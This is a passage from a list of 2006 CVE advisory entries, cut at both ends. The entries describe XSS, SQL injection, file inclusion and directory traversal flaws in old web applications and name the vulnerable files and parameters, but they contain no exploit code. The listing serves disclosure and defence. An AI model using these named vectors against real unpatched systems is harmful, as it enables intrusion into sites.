webplus.exe, which reveals the path in a "Script Not Found" error message. [CVE-2006-1894] Cross-site scripting (XSS) vulnerability in RevoBoard 1.8, as derived from PunBB, allows remote attackers to inject arbitrary web script or HTML via a substitution cipher of the email tag, which is transformed when the application's e-mail address obfuscator reverses the transformation. NOTE: it is not clear whether this is a site-specific issue [CVE-2006-1893] Cross-site scripting (XSS) vulnerability in print.php in ar-blog 5.2 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2006-1891] Cross-site scripting (XSS) vulnerability in Martin Scheffler betaboard 0.1 allows remote attackers to inject arbitrary web script or HTML via a user's profile, possibly using the FormVal_profile parameter. NOTE: it is not clear whether this is a distributable product or a site-specific vulnerability. If it is site-specific, then it should not be included in CVE. [CVE-2006-1890] Multiple PHP remote file inclusion vulnerabilities in myWebland myEvent 1.2 allow remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter in (1) event.php and (2) initialize.php. NOTE: vector 2 was later reported to affect 1.4 as well. [CVE-2006-1889] Cross-site scripting (XSS) vulnerability in the search action handler in index.php in Nils Asmussen (aka SCRIPTSOLUTION) Boardsolution 1.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the "Search for" item (keyword parameter). [CVE-2006-1888] phpGraphy 0.9.11 and earlier allows remote attackers to bypass authentication and gain administrator privileges via a direct request to index.php with the editwelcome parameter set to 1, which can then be used to modify the main page to inject arbitrary HTML and web script. NOTE: XSS attacks are resultant from this issue, since normal functionality allows the admin to modify pages. [CVE-2006-1878] Cross-site scripting (XSS) vulnerability in index.php in phpFaber TopSites allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1854] DISPUTED Multiple cross-site scripting (XSS) vulnerabilities in BluePay Manager 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML during a login action via the (1) Account Name and (2) Username field. NOTE: the vendor has disputed this vulnerability, saying that "it does not exist currently in the Bluepay 2.0 product," and older versions might not have been affected either. As of 20060512, CVE has not formally investigated this dispute. [CVE-2006-1850] Multiple cross-site scripting (XSS) vulnerabilities in xFlow 5.46.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) level, (2) position, (3) id, and (4) action parameters to members_only/index.cgi, and the (5) page parameter to customer_area/index.cgi. [CVE-2006-1848] Multiple cross-site scripting (XSS) vulnerabilities in stats_view.php in LinPHA 1.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, and (3) date parameter. [CVE-2006-1846] Cross-site scripting (XSS) vulnerability in the Your_Account module in PHP-Nuke 7.8 might allows remote attackers to inject arbitrary HTML and web script via the ublock parameter, which is saved in the user's personal menu. NOTE: the provenance of this information is unknown [CVE-2006-1843] Cross-site scripting (XSS) vulnerability in global.php in ShoutBOOK 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) LOCATION and (2) URL parameters. NOTE: the provenance of this information is unknown [CVE-2006-1842] Cross-site scripting (XSS) vulnerability in global.php in ShoutBOOK 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) NAME and (2) COMMENTS parameters. [CVE-2006-1841] Cross-site scripting (XSS) vulnerability in search.php in boastMachine (bMachine) 2.7, and possibly other versions before 2.9b, allows remote attackers to inject arbitrary web script or HTML via the key parameter, as used by the search field. [CVE-2006-1835] Cross-site scripting (XSS) vulnerability in yearcal.php in Calendarix allows remote attackers to inject arbitrary web script or HTML via the ycyear parameter. [CVE-2006-1833] Intel RNG Driver in NetBSD 1.6 through 3.0 may incorrectly detect the presence of the pchb interface, which will cause it to always generate the same random number, which allows remote attackers to more easily crack encryption keys generated from the interface. [CVE-2006-1826] Multiple cross-site scripting (XSS) vulnerabilities in Snipe Gallery 3.1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gallery_id parameter in view.php, (2) keyword parameter in search.php, and (3) image_id parameter in image.php. NOTE: it is possible that vectors 1 and 3 are resultant from SQL injection. [CVE-2006-1825] Cross-site scripting (XSS) vulnerability in index.php in phpLinks 2.1.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the term parameter. [CVE-2006-1824] Multiple cross-site scripting (XSS) vulnerabilities in PhpGuestbook.php in PhpGuestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Comment parameter. [CVE-2006-1822] Cross-site scripting (XSS) vulnerability in search.php in FarsiNews 2.5.3 Pro and earlier allows remote attackers to inject arbitrary web script or HTML via the selected_search_arch parameter. [CVE-2006-1820] Cross-site scripting (XSS) vulnerability in index.php in ModX 0.9.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this might be resultant from the directory traversal vulnerability. [CVE-2006-1819] Directory traversal vulnerability in the loadConfig function in index.php in phpWebSite 0.10.2 and earlier allows remote attackers to include arbitrary local files and execute arbitrary PHP code via the hub_dir parameter, as demonstrated by including access_log. NOTE: in some cases, arbitrary remote file inclusion could be performed under PHP 5 using an SMB share argument such as "\\systemname\sharename". [CVE-2006-1818] Multiple cross-site scripting (XSS) vulnerabilities in warforge.NEWS 1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly including the (1) first_name and (2) last_name parameter in myaccounts.php. NOTE: portions of these details were obtained from third party sources instead of the original disclosure. [CVE-2006-1815] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Tritanium Bulletin Board (TBB) 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) newuser_realname and (2) newuser_icq parameters, a different vector than CVE-2006-1768. NOTE: the provenance of this information is unknown [CVE-2006-1813] Directory traversal vulnerability in index.php in phpWebFTP 3.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the language parameter. [CVE-2006-1812] phpWebFTP 3.2 and earlier stores script.js under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information. [CVE-2006-1810] Multiple cross-site scripting (XSS) vulnerabilities in FlexBB 0.5.5 BETA allow remote attackers to inject arbitrary web script or HTML via the (1) ICQ, (2) AIM, (3) MSN, (4) Google Talk, (5) Website Name, (6) Website Address, (7) Email Address, (8) Location, (9) Signature, and (10) Sub-Titles fields in the user profile. [CVE-2006-1808] Cross-site scripting (XSS) vulnerability in index.php in Lifetype 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the show parameter in a Template operation. [CVE-2006-1806] Cross-site scripting (XSS) vulnerability in index.php in Musicbox 2.3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the term parameter in a search action. [CVE-2006-1803] Cross-site scripting (XSS) vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sql_query parameter. [CVE-2006-1802] Cross-site scripting (XSS) vulnerability in index.php in TinyWebGallery 1.3 and 1.4 allows remote attackers to inject arbitrary web script or HTML via the twg_album parameter. [CVE-2006-1801] Cross-site scripting (XSS) vulnerability in planetsearchplus.php in planetSearch+ allows remote attackers to inject arbitrary web script or HTML via the search_exp parameter. [CVE-2006-1797] The kernel in NetBSD-current before September 28, 2005 allows local users to cause a denial of service (system crash) by using the SIOCGIFALIAS ioctl to gather information on a non-existent alias of a network interface, which causes a NULL pointer dereference. [CVE-2006-1796] Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI']). [CVE-2006-1795] Cross-site scripting (XSS) vulnerability in tablepublisher.cgi in UPDI Network Enterprise @1 Table Publisher 2006-03-23 allows remote attackers to inject arbitrary web script or HTML via the Title of Table field. [CVE-2006-1786] Cross-site scripting (XSS) vulnerability in Adobe Document Server for Reader Extensions 6.0 allows remote attackers to inject arbitrary web script or HTML via (1) the actionID parameter in ads-readerext and (2) the op paremeter in AlterCast. NOTE: it is not clear whether the vendor advisory addresses this issue. [CVE-2006-1785] Adobe Document Server for Reader Extensions 6.0 allows remote authenticated users to inject arbitrary web script via a leading (1) ftp or (2) http URI in the ReaderURL variable in the "Update Download Site" section of ads-readerext. NOTE: it is not clear whether the vendor advisory addresses this issue. In addition, since the issue requires administrative privileges to exploit, it is not clear whether this crosses security boundaries. [CVE-2006-1783] Cross-site scripting (XSS) vulnerability in PatroNet CMS allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2006-1779] Cross-site scripting (XSS) vulnerability in login.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the btag parameter. [CVE-2006-1775] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.19 allow remote attackers to inject arbitrary web script or HTML via the (1) Site Description field in (a) admin_board.php, the (2) Group name and (3) Group description fields in (b) admin_groups.php and (c) groupcp.php, the (4) Theme Name field in (d) admin_styles.php, and the (5) Rank Title field in (e) admin_ranks.php. NOTE: the profile.php/Current password vector is already covered by CVE-2006-1603. [CVE-2006-1769] Multiple cross-site scripting (XSS) vulnerabilities in UserLand Manila 9.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the mode parameter in msgReader$1 and (2) the end of the URI in viewDepartment$. [CVE-2006-1768] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Tritanium Bulletin Board (TBB) 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) newuser_name, (2) newuser_email, and (3) newuser_hp parameters in the faction=register mode in index.php. [CVE-2006-1765] Cross-site scripting (XSS) vulnerability in index.php in JBook 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1764] Hosting Controller 6.1 stores forum/db/forum.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as user name and password credentials. NOTE: the provenance of this information is unknown [CVE-2006-1761] Cross-site scripting vulnerability in index.php in blur6ex 0.3.452 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter, which is not sanitized in the error message. NOTE: the vector in the shard parameter is not XSS and has been assigned a separate name. [CVE-2006-1760] Multiple cross-site scripting (XSS) vulnerabilities in JetPhoto allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) Classic.view/thumbnail.php, (2) Classic.view/gallery.php, (3) Classic.view/detail.php, or (4) Orange.view/detail.php [CVE-2006-1759] Cross-site scripting (XSS) vulnerability in allgemein_transfer.php in SWSoft Confixx 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the jahr parameter. [CVE-2006-1757] Cross-site scripting (XSS) vulnerability in index.php in Vegadns 0.99 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2006-1752] Multiple cross-site scripting (XSS) vulnerabilities in the backend in MvBlog before 1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) body fields in a comment. [CVE-2006-1750] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Autogallery 0.41 allow remote attackers to inject arbitrary web script or HTML via the (1) pic or (2) show parameters. [CVE-2006-1748] Cross-site scripting (XSS) vulnerability in XMB Forum 1.9.5 allows remote attackers to inject arbitrary web script or HTML by uploading a Flash (.SWF) video that contains a getURL function call, which causes the video to be rendered without disabling ActionScript. [CVE-2006-1745] Cross-site scripting (XSS) vulnerability in login.php in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: the provenance of this information is unknown [CVE-2006-1722] Cross-site scripting (XSS) vulnerability in suche.htm in ShopXS 4.0 allows remote attackers to inject arbitrary web script or HTML via the Suchstring1 (aka search) parameter. [CVE-2006-1720] Cross-site scripting (XSS) vulnerability in search.php in SaphpLesson 3.0 allows remote attackers to inject arbitrary web script or HTML via the Word parameter. NOTE: it is possible that this issue is resultant from SQL injection. [CVE-2006-1718] Magus Perde Clever Copy 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to view the database username and password via a direct request for connect.inc. [CVE-2006-1717] Cross-site scripting (XSS) vulnerability in newthread.php in MyBB (aka MyBulletinBoard) 1.10, when configured to permit new threads by unregistered users, allows remote attackers to inject arbitrary web script or HTML via the username. [CVE-2006-1716] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.10 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode img tag. NOTE: the email vector is already covered by CVE-2006-1625, although it might stem from the same core issue. [CVE-2006-1713] Cross-site scripting (XSS) vulnerability in index.php in Christoph Roeder phpMyForum 4.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1712] Cross-site scripting (XSS) vulnerability in the private archive script (private.py) in GNU Mailman 2.1.7 allows remote attackers to inject arbitrary web script or HTML via the action argument. [CVE-2006-1709] Cross-site scripting (XSS) vulnerability in shop_main.cgi in interaktiv.shop 5 allows remote attackers to inject arbitrary web script or HTML via the (1) pn and (2) sbeg parameters. [CVE-2006-1701] Cross-site scripting (XSS) vulnerability in the Pages module in Shadowed Portal allows remote attackers to inject arbitrary web script or HTML via the page parameter to load.php. [CVE-2006-1700] Buy.php in Aweb Scripts Seller uses predictable cookies for authentication based on the time and the script number, which allows remote attackers to bypass authentication. [CVE-2006-1699] Cross-site scripting (XSS) vulnerability in index.php in Aweb Banner Generator 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the banner parameter in view mode. [CVE-2006-1698] Cross-site scripting (XSS) vulnerability in Matt Wright Guestbook 2.3.1 allows remote attackers to execute arbitrary web script or HTML via the (1) url, (2) city, (3) state, or (4) country parameters. NOTE: the provenance of this information is unknown [CVE-2006-1697] Cross-site scripting (XSS) vulnerability in Matt Wright Guestbook 2.3.1 allows remote attackers to execute arbitrary web script or HTML via the (1) Your Name, (2) E-Mail, or (3) Comments fields when posting a message. [CVE-2006-1696] Cross-site scripting (XSS) vulnerability in Gallery before 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1690] Cross-site scripting (XSS) vulnerability in subscribe.php in MWNewsletter 1.0.0b allows remote attackers to inject arbitrary web script or HTML via the user_name parameter. [CVE-2006-1687] Cross-site scripting (XSS) vulnerability in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allows remote attackers to inject arbitrary web script or HTML via the message parameter, probably involving the basket functionality. [CVE-2006-1686] Unspecified vulnerability in modules.php in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allows remote attackers to access unspecified files via a modified warp parameter. [CVE-2006-1685] Multiple SQL injection vulnerabilities in modules.php in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allow remote attackers to execute arbitrary SQL commands via the (1) group, (2) seite, and (3) id parameter, possibly involving the artikel functionality. NOTE: this vulnerability also allows resultant path disclosure when the SQL queries are invalid. [CVE-2006-1682] Cross-site scripting (XSS) vulnerability in webplus.exe in TalentSoft Web+Shop 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the deptname parameter, possibly involving the webpshop/ department.wml script. [CVE-2006-1681] Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. [CVE-2006-1679] Cross-site scripting (XSS) vulnerability in modules/online.php in Jupiter CMS 1.1.5 allows remote attackers to inject arbitrary web script or HTML via the layout parameter to index.php. [CVE-2006-1678] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.8.0.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors in unspecified scripts in the themes directory. [CVE-2006-1675] Multiple cross-site scripting (XSS) vulnerabilities in PHPWebGallery 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) num, and (3) search parameters to (a) category.php, and the (4) slideshow, (5) show_metadata, and (6) start parameters to (b) picture.php, a different vulnerability than CVE-2006-1674. [CVE-2006-1674] Cross-site scripting (XSS) vulnerability in search.php in PHPWebGallery 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-1675. [CVE-2006-1673] Cross-site scripting (XSS) vulnerability in vbugs.php in Dark_Wizard vBug Tracker 3.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the sortorder parameter. [CVE-2006-1665] Multiple cross-site scripting (XSS) vulnerabilities in Arab Portal 2.0.1 stable allow remote attackers to inject arbitrary web script or HTML via the (1) adminJump and (2) forum_middle parameters in (a) forum.php, and the (3) form parameter in (b) members.php, (c) pm.php, and (d) mail.php. [CVE-2006-1661] Multiple cross-site scripting (XSS) vulnerabilities in SKForum 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) areaID parameter in area.View.action, (2) time parameter in planning.View.action, and (3) userID parameter in user.View.action. [CVE-2006-1660] Cross-site scripting (XSS) vulnerability in image_desc.php in Softbiz Image Gallery allows remote attackers to inject arbitrary web script or HTML via msg parameter. NOTE: the provenance of this information is unknown [CVE-2006-1657] Cross-site scripting (XSS) vulnerability in index.php in Chucky A. Ivey N.T. 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter, which is not filtered when the administrator views the "Login Log" page. [CVE-2006-1645] Cross-site scripting (XSS) vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP header, which is displayed by admin/modules/general/statistic.php in the administration panel. [CVE-2006-1642] Cross-site scripting (XSS) vulnerability in Interact 2.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) the search_terms parameter to (a) search.php, and (2) the first_name, (3) last_name, (4) email, (5) password, and (6) confirm_password parameters to (b) userinput.php. NOTE: the provenance of this information is unknown [CVE-2006-1640] Cross-site scripting (XSS) vulnerability in news.php in CzarNews 1.14 allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2006-1638] Multiple SQL injection vulnerabilities in aWebBB 1.2 allow remote attackers to execute arbitrary SQL commands via the (1) Username parameter to (a) accounts.php, (b) changep.php, (c) editac.php, (d) feedback.php, (e) fpass.php, (f) login.php, (g) post.php, (h) reply.php, or (i) reply_log.php [CVE-2006-1637] Multiple cross-site scripting (XSS) vulnerabilities in aWebBB 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) tname or (2) fpost parameters to (a) post.php [CVE-2006-1634] Cross-site scripting (XSS) vulnerability in index.php in LucidCMS 2.0.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the command parameter. [CVE-2006-1625] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.10 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode email tag, as demonstrated using the onmousemove event. [CVE-2006-1622] Cross-site scripting (XSS) vulnerability in PHPSelect linksubmit allows remote attackers to inject arbitrary web script or HTML via (1) the description parameter to linklist.php and possibly other vectors involving (2) index.php and (3) linksubmit.php. [CVE-2006-1619] IBM WebSphere Application Server 4.0.1 through 4.0.3 allows remote attackers to cause a denial of service (application crash) via an HTTP request with a large header. [CVE-2006-1617] Multiple cross-site scripting (XSS) vulnerabilities in Advanced Poll 2.02 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to comments.php or (2) poll_id parameter to page.php. NOTE: it is possible that this issue is resultant from CVE-2006-1616. [CVE-2006-1613] Multiple SQL injection vulnerabilities in aWebNews 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) user123 variable in (a) login.php or (b) fpass.php [CVE-2006-1612] Multiple cross-site scripting (XSS) vulnerabilities in visview.php in aWebNews 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) yname, (2) emailadd, (3) subject, and (4) comment parameters. [CVE-2006-1603] Cross-site scripting (XSS) vulnerability in profile.php in phpBB 2.0.19 allows remote attackers to inject arbitrary web script or HTML via the cur_password parameter. NOTE: the provenance of this information is unknown [CVE-2006-1600] SQL injection vulnerability in category.php in PhpWebGallery 1.4.1 allows remote attackers to execute arbitrary SQL commands via the search parameter. [CVE-2006-1590] Cross-site scripting (XSS) vulnerability in the PrintFreshPage function in (1) Basic Analysis and Security Engine (BASE) 1.2.4 and (2) Analysis Console for Intrusion Databases (ACID) 0.9.6b23 allows remote attackers to inject arbitrary web script or HTML via the (a) back parameter to base_graph_main.php, (b) netmask parameter to base_stat_ipaddr.php, or (c) submit parameter to base_qry_alert.php within BASE, or (d) query string to acid_main.php in ACID, which causes the request URI ($_SERVER['REQUEST_URI']) to be inserted into a refresh operation. [CVE-2006-1584] Unspecified vulnerability in index.php in Warcraft III Replay Parser for PHP 1.8c allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to fopen function calls or file uploads. NOTE: post-disclosure analysis by CVE suggests that the "page" parameter is not used in this product, and "id" might be the affected parameter. [CVE-2006-1583] Cross-site scripting (XSS) vulnerability in index.php in Warcraft III Replay Parser for PHP 1.8c allows remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: post-disclosure analysis by CVE suggests that the "page" parameter is not used in this product, and "id" might be the affected parameter. [CVE-2006-1582] Cross-site scripting (XSS) vulnerability in index.php in Blank'N'Berg 0.2 allows remote attackers to inject arbitrary web script or HTML via the _path parameter. NOTE: this might be resultant from the directory traversal issue. [CVE-2006-1580] Multiple cross-site scripting (XSS) vulnerabilities in Bugzero 4.3.1 and other versions allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter in query.jsp and (2) entryId parameter in edit.jsp. [CVE-2006-1577] Multiple cross-site scripting (XSS) vulnerabilities in view_all_set.php in Mantis 1.0.1, 1.0.0rc5, and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) start_day, (2) start_year, and (3) start_month parameters. [CVE-2006-1575] Multiple cross-site scripting (XSS) vulnerabilities in news.php in QLnews 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) autorx and (2) newsx parameters. [CVE-2006-1574] Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1570] Cross-site scripting (XSS) vulnerability in Esqlanelapse 2.0 and 2.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1568] Multiple cross-site scripting (XSS) vulnerabilities in register.php in RedCMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) email, (2) location, or (3) website parameters. [CVE-2006-1567] Cross-site scripting (XSS) vulnerability in searchresults.asp in SiteSearch Indexer 3.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchField parameter. [CVE-2006-1562] Multiple cross-site scripting (XSS) vulnerabilities in index.php in vscripts (aka Kuba Kunkiewicz) [V]Book (aka VBook) 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) autor, (2) www, (3) temat, and (4) tresc parameters. [CVE-2006-1558] Cross-site scripting (XSS) vulnerability in search.php in PHP Script Index allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2006-1556] Multiple cross-site scripting (XSS) vulnerabilities in view_caricatier.php in AL-Caricatier 2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) CatName, (2) CaricatierID, or (3) CatID parameter. [CVE-2006-1554] Cross-site scripting (XSS) vulnerability in VSNS Lemon 3.2.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter while adding a comment. [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message. [CVE-2006-1544] Multiple cross-site scripting (XSS) vulnerabilities in news.php in vscripts (aka Kuba Kunkiewicz) VNews 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) autorkomentarza and (2) tresckomentarza parameters. [CVE-2006-1537] Craig Knudsen WebCalendar 1.1.0-CVS allows remote attackers to obtain sensitive information via a direct request to (1) includes/index.php, (2) tests/add_duration_test.php, (3) tests/all_tests.php, (4) groups.php, (5) nonusers.php, (6) includes/settings.php, (7) includes/init.php, (8) includes/settings.php.orig, (9) includes/js/admin.php, (10) includes/js/edit_entry.php, (11) includes/js/edit_layer.php, (12) includes/js/export_import.php, (13) includes/js/popups.php, (14) includes/js/pref.php, or (15) includes/menu/index.php, which reveal the path in various error messages. [CVE-2006-1535] Cross-site scripting (XSS) vulnerability in login.php in Phoetux.net PhxContacts 0.93.1 beta and earlier allows remote attackers to inject arbitrary web script or HTML via the m parameter. [CVE-2006-1532] Cross-site scripting (XSS) vulnerability in search.php in PHP Classifieds 6.18, 6.20, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. [CVE-2006-1508] Multiple cross-site scripting (XSS) vulnerabilities in MH Software Connect Daily Web Calendar Software 3.2.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) calendar_id, (2) style_sheet, and (3) start parameters in (a) ViewDay.html [CVE-2006-1507] Cross-site scripting (XSS) vulnerability in PHPKIT 1.6.03 allows remote attackers to inject arbitrary web script or HTML via the error parameter to include.php, possibly due to a problem in login/login.php. [CVE-2006-1504] Multiple cross-site scripting (XSS) vulnerabilities in Arab Portal 2.0 (aka Arab Dynamic Portal or ADP) stable allow remote attackers to inject arbitrary web script or HTML via the title parameter in (1) online.php and (2) download.php. [CVE-2006-1498] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.5.8 and 1.4.15 allows remote attackers to inject arbitrary web script or HTML via crafted encoded links. [CVE-2006-1496] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via (1) a remote URL in the page parameter, which is processed by an fopen call, or (2) HTML or script in the page parameter, which is returned to the client in an error message for the failed fopen call. [CVE-2006-1493] Cross-site scripting (XSS) vulnerability in dir.php in Explorer XP allows remote attackers to inject arbitrary web script or HTML via the chemin parameter. NOTE: it is possible that this issue is resultant from CVE-2006-1492. [CVE-2006-1487] Cross-site scripting (XSS) vulnerability in ActiveCampaign SupportTrio 2.50.2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the KnowledgeBase search module. [CVE-2006-1486] Multiple cross-site scripting (XSS) vulnerabilities in index.cfm in realestateZONE 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) bamin, (2) bemin, (3) pmin, and (4) state parameters. [CVE-2006-1485] gm-upload.cgi in Greymatter 1.3.1 allows remote authenticated users with upload privileges to execute arbitrary programs by uploading files to locations within the web root. NOTE: the provenance of this information is unknown [CVE-2006-1483] Blazix Web Server before 1.2.6, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot), (2) space, and (3) slash characters in the extension of a URL. [CVE-2006-1482] Cross-site scripting (XSS) vulnerability in index.php in ConfTool 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1480] Directory traversal vulnerability in start.php in WebAlbum 2.02 allows remote attackers to include arbitrary files and execute commands by (1) injecting code into local log files via GET commands, then (2) accessing that log via a .. (dot dot) sequence and a trailing null (%00) byte in the skin2 COOKIE parameter. [CVE-2006-1479] Multiple cross-site scripting (XSS) vulnerabilities in Serge Rey gtd-php (aka Getting Things Done) 0.5 allow remote attackers to inject arbitrary web script or HTML via the Description field in (1) newProject.php, (2) newList.php, and (3) newWaitingOn.php [CVE-2006-1478] Directory traversal vulnerability in (1) initiate.php and (2) possibly other PHP scripts in Turnkey Web Tools PHP Live Helper 1.8, and possibly later versions, allows remote authenticated users to include and execute arbitrary local files via directory traversal sequences in the language cookie, as demonstrated by uploading PHP code in a gl_session cookie to users.php, which causes the code to be stored in error.log, which is then included by initiate.php. [CVE-2006-1477] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Live Helper 1.8 allow remote attackers to include and execute arbitrary PHP code via the abs_path parameter in (1) initiate.php, (2) waiting.php, (3) welcome.php, (4) admin/index.php, (5) javascript.php, (6) checkchat.php, and (7) blank.php. [CVE-2006-1474] Cross-site scripting (XSS) vulnerability in the "failed" functionality in Raindance Web Conferencing Pro allows remote attackers to inject arbitrary web script or HTML via the browser parameter. [CVE-2006-1466] Xcode Tools before 2.3 for Mac OS X 10.4, when running the WebObjects plugin, allows remote attackers to access or modify WebObjects projects through a network service. [CVE-2006-1438] Multiple cross-site scripting (XSS) vulnerabilities in Andy's PHP Knowledgebase (aphpkb) 0.57 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword_list parameter to (a) index.php [CVE-2006-1437] UPOINT @1 Event Publisher stores sensitive information under the web document root with insufifcient access control, which allows remote attackers to read private comments via a direct request to eventpublisher.txt. [CVE-2006-1436] Multiple cross-site scripting (XSS) vulnerabilities in UPOINT @1 Event Publisher allow remote attackers to inject arbitrary web script or HTML via the (1) Event, (2) Description, (3) Time, (4) Website, and (5) Public Remarks fields to (a) eventpublisher_admin.htm and (b) eventpublisher_usersubmit.htm. [CVE-2006-1435] Cross-site scripting (XSS) vulnerability in genmessage.php in Accounting Receiving and Inventory Administration (ARIA) 0.99-6 allows remote attackers to inject arbitrary web script or HTML via the Message Field (message parameter). [CVE-2006-1434] Cross-site scripting (XSS) vulnerability in inscription.php in Annuaire (Directory) 1.0 allows remote attackers to inject arbitrary web script or HTML via the Comment Field (COMMENTAIRE parameter). [CVE-2006-1432] fusionZONE couponZONE 4.2 allows remote attackers to obtain the full path of the web server, and other sensitive information, via invalid values, as demonstrated using manipulations associated with SQL. [CVE-2006-1431] Cross-site scripting (XSS) vulnerability in local.cfm in fusionZONE couponZONE 4.2 allows remote attackers to inject arbitrary web script or HTML via URL-encoded (1) srchfor and (2) srchby parameters. [CVE-2006-1430] Multiple cross-site scripting (XSS) vulnerabilities in CONTROLzx HMS (formerly DRZES) 3.3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dedicatedPlanID parameter to dedicated_order.php, (2) sharedPlanID parameter to shared_order.php, (3) plan_id parameter to customers/server_management.php, and (4) email field to customers/forgotpass.php. [CVE-2006-1429] Cross-site scripting (XSS) vulnerability in accountlogon.cfm in 